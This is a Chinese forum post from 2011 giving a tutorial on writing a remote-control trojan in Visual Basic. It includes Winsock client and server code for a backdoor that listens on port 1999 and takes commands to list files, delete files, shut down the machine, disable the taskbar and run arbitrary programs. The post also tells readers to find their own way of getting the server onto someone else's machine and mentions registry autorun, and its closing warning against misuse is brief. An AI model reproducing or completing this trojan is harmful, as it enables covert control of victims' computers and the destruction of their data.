帮助
版权保护
今日发帖冠军:
小强
1贴
最新主题
最新回复
DNF单机版
dnf单机版存档
网游单机
高级搜索
等级: 游客
帖子:
今日:
龙鳞: 片
铜币: 枚
能量: 点
最后登录:
登录IP:
3.144.34.162
用户名
UID
Email
注册新帐号
密 码
忘记密码?
下次自动登录
您好,欢迎来中华游戏网!
请登录
立即注册
购买会员
购买积分
购买胸章
版主签到
精华汇总
附件展区
积分兑换
统计排行
基本信息
到访IP统计
管理团队
管理操作
在线会员
会员排行
版块排行
帖子排行
版主签到
一键打卡
每日打卡
龙鳞魔堡
金豆锻造
荣誉胸章
海底寻宝
非诚勿扰
虚拟刮奖
杂货道具
好友印象
心情随笔
中华银行
家族部落
积分兑换
图片上传
在线查毒
网游单机下载
聊天交友乐园
作品交流
自拍自曝
图片设计
论坛使用帮助
隐藏
快速浏览
站务综合
新手接待小屋
站务处理
你问我答[悬赏]
精彩活动
申请胸章
申请职务
社区公告
管理会议厅
游戏综合区
网游单机下载
网游单机交流
单机游戏下载
单机游戏交流
地下城与勇士单机版
DNF单机版交流区
DNF单机版存档分享
DNF单机版DIY专区
DNF单机版2
热门游戏专区
英雄联盟 LOL
DNF地下城与勇士
暗黑破坏神
CF穿越火线
魔兽争霸3
火炬之光
PAL仙剑奇侠传
Android/IOS手机游戏
休闲娱乐专区
聊天交友乐园
欢乐雷人恶搞
大杂烩
QQ技术交流
午夜恐怖奇谈
精品软件下载
电脑技术交流
自拍自曝
综合精美贴图
中华影院
音乐不断
动漫交流
图片设计
梦幻少女物语
娱乐圈新视点
时尚流行广场
中华游戏网
»
电脑技术交流
»
浅谈用VB编写木马程序
发表帖子
发表新帖
回帖
返回列表
No.223124
494063570
登录解锁详细资料
[道具]
[倒序]
[只看他]
[
屏蔽签名
|
屏蔽头像
]
浅谈用VB编写木马程序
我顶
我踩
本贴由:
中华游戏网
会员:
494063570
发表于: 2011-09-04 15:47 共
10827
人围观
0
人回复
---- BO又称“特洛伊木马”,是在美国一次黑客技术讨
论会上由一个黑客组织推出的。它其实是一种客户机/服
务器程序,其利用的原理就是:在本机直接启动运行的
程序拥有与使用者相同的权限。因此如果能够启动服务
器端(即被攻击的计算机)的服务器程序,就可以使用
相应的客户端工具客户程序直接控制它了。下面来谈谈
如何用VB来实现它。
该隐藏帖已经发布超过60天,已自动取消隐藏功能,无需回复即可查看!
----
使用VB建立两个程序,一个为客户端程序Client,一
个为服务器端程序systry。
---- 在Client工程中建立一个窗体,加载WinSock控件,
称为tcpClient,协议选择TCP,再加入两个文本框,用以
输入服务器的IP地址或服务器名,然后建立一个按钮,
按下之后就可以对连接进行初始化了,代码如下:
Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("
请输入主机名或主机IP地址。
")
Exit Sub
Else
If Len(Text1.Text) > 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub
---- 连接建立之后就可以使用DataArrival事件处理所收到
的数据了。
---- 在服务器端systry工程也建立一个窗体,加载
WinSock控件,称为tcpServer,协议选择TCP,在
Form_Load事件中加入如下代码:
Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub
---- 准备应答客户端程序的请求连接,使用
ConnectionRequest事件来应答户端程序的请求,代码如
下:
Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State < > sckClosed Then
tcpServer.Close‘检查控件的 State 属性是否为关
闭的。
End If '
如果不是,在接受新的连接之前先关闭此连
接。
tcpServer.Accept requestID
End Sub
---- 这样在客户端程序按下了连接按钮后,服务器端程序
的ConnectionRequest事件被触发,执行了以上的代码。
如果不出意外,连接就被建立起来了。
---- 建立连接后服务器端的程序通过DataArrival事件接收
客户机端程序所发的指令运行既定的程序。如:把服务
器端的驱动器名、目录名、文件名等传到客户机端,客
户机端接收后用TreeView控件以树状的形式显示出来,
浏览服务器端文件目录;强制关闭或重启服务器端的计
算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端
传过来的文件名或目录名,而删除它;屏蔽热启动键;
运行服务器端的任何程序;还包括获取目标计算机屏幕
图象、窗口及进程列表;激活、终止远端进程;打开、
关闭、移动远端窗口;控制目标计算机鼠标的移动与动
作;交换远端鼠标的左右键;在目标计算机模拟键盘输
入,下载、上装文件;提取、创建、修改目标计算机系
统注册表关键字;在远端屏幕上显示消息。DataArrival
事件程序如下:
Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)
Dim strData As String
Dim i As Long
Dim mKey As String
tcpServer.GetData strData
‘
接收数据并存入
strData
For i = 1 To Len(strData)
‘分离strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
‘
把命令ID号存入
mKey
‘把命令参数存入
strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
‘
驱动器名、目录名、文件名
Case 2
强制关闭服务器端的计算机
Case 3
强制重启服务器端的计算机
Case 4
屏蔽任务栏窗口;
Case 5
屏蔽开始菜单;
Case 6
按照客户机端传过来的文件名或目录名,而删除
它;
Case 7
屏蔽热启动键;
Case 8
运行服务器端的任何程序
End Select
End Sub
详细程序略。
---- 客户机端用tcpClient.SendData发命令。命令包括命
令ID和命令参数,它们用符号“@”隔开。
---- 另外,当客户机端断开与服务器端的来接后,服务器
端应用tcpServer_Close事件,来继续准备接收客户机端
的请求,其代码如下:
Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub
---- 这就是一个最基本的特洛伊木马程序,只要你的机器
运行了服务器端程序,那别人就可以在千里之外控制你
的计算机。至于如何让服务器端程序运行就要发挥你的
聪明才智了,在我的源程序中有一中方法,是修改系统
注册表的方法。
--- 成功的特洛伊木马程序要比这个复杂一些,还有程序
的隐藏、自动复制、传播等问题要解决。警告:千万不
要用BO程序破坏别人的系统。
打赏楼主
点评记录(共条)
CNYOUW.CN
SIGNATURE
中华游戏网 — 玩你所玩,乐你所乐!
cnyouw.cn
评分选定
举报
楼主
回复
引用
发表新帖
回帖
中华游戏网
»
电脑技术交流
http://cnyouw.cn
您访问的链接为外部链接,请注意安全!
继续访问
取消访问
快速回复
限 160 字节
懒人下拉选择回复语句
谢谢楼主分享,这个帖子不回对不起自己!
举双手支持楼主。
好帖,收藏了!谢谢楼主!
好文章,又学习了。
难得一见的好文章,顶了!
楼主你太有才了!
楼主辛苦了,谢谢楼主分享!
看看究竟多神秘。
我来学习学习。
音乐太美了,就喜欢这样的音乐。
感谢楼主及时为我们提供信息!
楼主检查一下,连接好像失效了。
其实我一直觉得楼主的品味不错!呵呵!
中华游戏网不能没有像楼主这样的人才
中华游戏网 因为有你更精彩!
进入高级模式[可上传附件]
加粗
字体颜色
背景颜色
插入链接
图片
验证问题:
我们网站的中文名是什么? 正确答案:
Ctrl + Enter 快速发布
匿名回贴(消耗10铜币)
上一个
下一个
中华游戏网首班列车驶于2006年8月1号,已行驶
天
小时
分
秒